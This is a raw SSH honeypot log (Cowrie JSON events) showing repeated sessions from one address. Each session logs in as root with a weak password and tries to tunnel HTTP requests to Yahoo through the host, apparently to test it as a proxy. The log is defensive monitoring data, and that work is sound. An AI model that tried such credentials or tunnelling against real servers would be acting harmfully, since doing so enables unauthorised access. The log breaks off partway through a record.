{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18097,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2f45c051aaf","protocol":"ssh","message":"New connection: 213.209.150.239:18097 (1.2.3.4:22) [session: f2f45c051aaf]","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.107026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.116994Z","src_ip":"213.209.150.239","session":"f2f45c051aaf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.154586Z","src_ip":"213.209.150.239","session":"f2f45c051aaf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.389386Z","src_ip":"213.209.150.239","session":"f2f45c051aaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10769,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10769","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.438039Z","session":"f2f45c051aaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.485485Z","src_ip":"213.209.150.239","session":"f2f45c051aaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18453,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18453","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.629354Z","session":"f2f45c051aaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.676513Z","src_ip":"213.209.150.239","session":"f2f45c051aaf"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.724568Z","src_ip":"213.209.150.239","session":"f2f45c051aaf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18154,"dst_ip":"1.2.3.4","dst_port":22,"session":"474af9ca8ec4","protocol":"ssh","message":"New connection: 213.209.150.239:18154 (1.2.3.4:22) [session: 474af9ca8ec4]","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.771278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.772445Z","src_ip":"213.209.150.239","session":"474af9ca8ec4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.819647Z","src_ip":"213.209.150.239","session":"474af9ca8ec4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.054817Z","src_ip":"213.209.150.239","session":"474af9ca8ec4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":19684,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:19684","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.103056Z","session":"474af9ca8ec4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.150357Z","src_ip":"213.209.150.239","session":"474af9ca8ec4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":18602,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18602","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.285520Z","session":"474af9ca8ec4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.332763Z","src_ip":"213.209.150.239","session":"474af9ca8ec4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.380744Z","src_ip":"213.209.150.239","session":"474af9ca8ec4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18200,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f1451a05e6","protocol":"ssh","message":"New connection: 213.209.150.239:18200 (1.2.3.4:22) [session: e6f1451a05e6]","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.427026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.427933Z","src_ip":"213.209.150.239","session":"e6f1451a05e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.475558Z","src_ip":"213.209.150.239","session":"e6f1451a05e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.710719Z","src_ip":"213.209.150.239","session":"e6f1451a05e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16304,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16304","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.758853Z","session":"e6f1451a05e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.806022Z","src_ip":"213.209.150.239","session":"e6f1451a05e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":202,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:202","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.941667Z","session":"e6f1451a05e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:24.988920Z","src_ip":"213.209.150.239","session":"e6f1451a05e6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.036875Z","src_ip":"213.209.150.239","session":"e6f1451a05e6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18254,"dst_ip":"1.2.3.4","dst_port":22,"session":"5171eb4d35e8","protocol":"ssh","message":"New connection: 213.209.150.239:18254 (1.2.3.4:22) [session: 5171eb4d35e8]","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.092578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.093480Z","src_ip":"213.209.150.239","session":"5171eb4d35e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.150219Z","src_ip":"213.209.150.239","session":"5171eb4d35e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.433391Z","src_ip":"213.209.150.239","session":"5171eb4d35e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23667,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23667","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.491264Z","session":"5171eb4d35e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.548077Z","src_ip":"213.209.150.239","session":"5171eb4d35e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10630,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10630","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.703080Z","session":"5171eb4d35e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.760081Z","src_ip":"213.209.150.239","session":"5171eb4d35e8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.817817Z","src_ip":"213.209.150.239","session":"5171eb4d35e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18310,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c985cf9cbd7","protocol":"ssh","message":"New connection: 213.209.150.239:18310 (1.2.3.4:22) [session: 7c985cf9cbd7]","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.863931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.864605Z","src_ip":"213.209.150.239","session":"7c985cf9cbd7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:25.911895Z","src_ip":"213.209.150.239","session":"7c985cf9cbd7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.146299Z","src_ip":"213.209.150.239","session":"7c985cf9cbd7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11504,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11504","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.194322Z","session":"7c985cf9cbd7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.241690Z","src_ip":"213.209.150.239","session":"7c985cf9cbd7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25559,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25559","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.377556Z","session":"7c985cf9cbd7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.424765Z","src_ip":"213.209.150.239","session":"7c985cf9cbd7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.472435Z","src_ip":"213.209.150.239","session":"7c985cf9cbd7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18372,"dst_ip":"1.2.3.4","dst_port":22,"session":"d96bee82e81f","protocol":"ssh","message":"New connection: 213.209.150.239:18372 (1.2.3.4:22) [session: d96bee82e81f]","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.518492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.519520Z","src_ip":"213.209.150.239","session":"d96bee82e81f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@